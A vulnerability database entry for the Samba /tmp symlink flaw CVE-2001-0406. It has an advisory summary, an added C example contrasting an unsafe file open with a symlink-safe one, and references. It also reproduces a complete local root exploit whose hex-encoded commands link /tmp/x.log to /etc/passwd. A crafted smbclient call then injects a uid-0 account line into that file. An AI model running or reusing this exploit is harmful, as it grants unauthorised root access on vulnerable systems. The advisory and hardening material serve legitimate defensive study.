Samba Insecure TMP File Symbolic Link Vulnerability

Vulnerability ID: 1106305
Vulnerability type: Access validation error
Published: 2001-04-17
Updated: 2005-10-20
CVE ID: CVE-2001-0406
CNNVD-ID: CNNVD-200107-042
Platform: Linux
CVSS score: 2.1
|Vulnerability source
https://www.exploit-db.com/exploits/20776
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200107-042
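|Vulnerability details
Samba versions before 2.2.0 are vulnerable. A local attacker can overwrite arbitrary files via a symlink attack using (1) a printer queue query, (2) the more command in smbclient, or (3) the mput command in smbclient.
|Exploit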
source: http://www.securityfocus.com/bid/2617/info

Samba is a flexible file sharing package maintained by the Samba development group. It provides interoperability between UNIX and Microsoft Windows systems, permitting the sharing of files and printing services.

A problem in the package could make it possible to deny service to legitimate users. Due to the insecure creation of files in the /tmp file system, it is possible for a user to create a symbolic link to other files owned by privileged users in the system, such as system device files, and write data to the files.

This vulnerability makes it possible for a local user to deny service to other users of the system, and potentially gain elevated privileges. 
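
The insecure /tmp file creation described above, set beside a symlink-safe open. This is an added example, not code from Samba or from the original advisory; the function names, the /tmp/symdemoXXXXXX scratch directory and the sample file contents are constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Weak pattern: fixed name, follows a planted symlink and truncates its target. */
int open_log_weak(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened: O_EXCL fails if anything, a symlink included, already sits at
 * path; O_NOFOLLOW refuses a symlink as the last component; mode is 0600. */
int open_log_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

static long size_of(const char *p) {
    struct stat st;
    return stat(p, &st) == 0 ? (long)st.st_size : -1;
}
/* Constructed scenario inside a private mkdtemp() directory: "victim" stands
 * in for a privileged file and "x.log" is the pre-planted link to it.
 * Returns a bitmask: 1 = safe open refused the link and victim is intact,
 * 2 = safe open created a fresh file, 4 = weak open emptied victim. */
int demo(void) {
    char dir[] = "/tmp/symdemoXXXXXX", victim[64], lnk[64], fresh[64];
    int fd, result = 0;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/x.log", dir);
    snprintf(fresh, sizeof fresh, "%s/new.log", dir);
    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, "sample data\n", 12) != 12) return -1;
    close(fd);
    if (symlink(victim, lnk) != 0) return -1;
    fd = open_log_safe(lnk);
    if (fd < 0 && size_of(victim) == 12) result |= 1;
    if (fd >= 0) close(fd);
    fd = open_log_safe(fresh);
    if (fd >= 0) { result |= 2; close(fd); }
    fd = open_log_weak(lnk);
    if (fd >= 0 && size_of(victim) == 0) result |= 4;
    if (fd >= 0) close(fd);
    unlink(lnk); unlink(fresh); unlink(victim); rmdir(dir);
    return result;
}
int main(void) { printf("demo() = %d\n", demo()); return 0; }
```

For scratch files whose name does not need to be fixed, mkstemp() gives the same exclusive-create guarantee with an unpredictable name.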

/*
 * Samba Server r00t exploit
 *
 * Scope: Local (this exploit) and possible remote if conditions are given.
 * Vuln:
 *      RedHat 5.1
 *      RedHat 5.2
 *      RedHat 6.0
 *      RedHat 6.1
 *      RedHat 6.2
 *      RedHat 7.0
 *      RedHat 7.1
 *      I don't know if other versions are vulnerable too.
 *
 * Run this exploit and then take a look at your passwd file.
 * Run: ./samba-exp user
 *
 * Author:      Gabriel Maggiotti
 * Email:       [email protected]
 * Webpage:     http://qb0x.net
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc,char *argv[])
{
/* "/bin/rm -rf /tmp/x.log" */
char inject1[]=
        "\x2f\x62\x69\x6e\x2f\x72\x6d\x20\x2d\x72\x66\x20\x2f"
        "\x74\x6d\x70\x2f\x78\x2e\x6c\x6f\x67";
/* "/bin/ln -s /etc/passwd /tmp/x.log" */
char inject2[]=
        "\x2f\x62\x69\x6e\x2f\x6c\x6e\x20\x2d\x73\x20\x2f\x65"
        "\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x2f\x74\x6d"
        "\x70\x2f\x78\x2e\x6c\x6f\x67";
/* Start of the smbclient command line; the user name is appended below */
char inject3a[100]=
        "\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x6d\x62\x63"
        "\x6c\x69\x65\x6e\x74\x20\x2f\x2f\x6c\x6f\x63\x61\x6c"
        "\x68\x6f\x73\x74\x2f\x22\xa\xa";
/* Rest of the smbclient command line, ending in "-n ../../../tmp/x -N" */
char inject3b[]=
        "\x3a\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e"
        "\x2f\x73\x68\x5c\x6e\x22\x20\x2d\x6e\x20\x2e\x2e\x2f"
        "\x2e\x2e\x2f\x2e\x2e\x2f\x74\x6d\x70\x2f\x78\x20\x2d"
        "\x4e\xa";

if(argc!=2){
        fprintf(stderr,"usage: %s <user>\n",*argv);
        return 1;
        }
strcat(inject3a,argv[1]);
strcat(inject3a,inject3b);
system(inject1);
system(inject2);
system(inject3a);

return 0;
}
|References

Source: US-CERT Vulnerability Note: VU#670568
Name: VU#670568
Link: http://www.kb.cert.org/vuls/id/670568
Source: DEBIAN
Name: DSA-048
Link: http://www.debian.org/security/2001/dsa-048
Source: CALDERA
Name: CSSA-2001-015.0
Link: http://www.caldera.com/support/security/advisories/CSSA-2001-015.0.txt
Source: BUGTRAQ
Name: 20010418 PROGENY-SA-2001-05: Samba /tmp vulnerabilities
Link: http://archives.neohapsis.com/archives/bugtraq/2001-04/0326.html
Source: BUGTRAQ
Name: 20010418 TSLSA-#2001-0005 - samba
Link: http://archives.neohapsis.com/archives/bugtraq/2001-04/0319.html
Source: BUGTRAQ
Name: 20010417 Samba 2.0.8 security fix
Link: http://archives.neohapsis.com/archives/bugtraq/2001-04/0305.html
Source: BID
Name: 2617
Link: http://www.securityfocus.com/bid/2617
Source: MANDRAKE
Name: MDKSA-2001:040
Link: http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-040.php3
Source: FREEBSD
Name: FreeBSD-SA-01:36
Link: http://archives.neohapsis.com/archives/freebsd/2001-04/0608.html
Source: CONECTIVA
Name: CLA-2001:395
Link: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000395
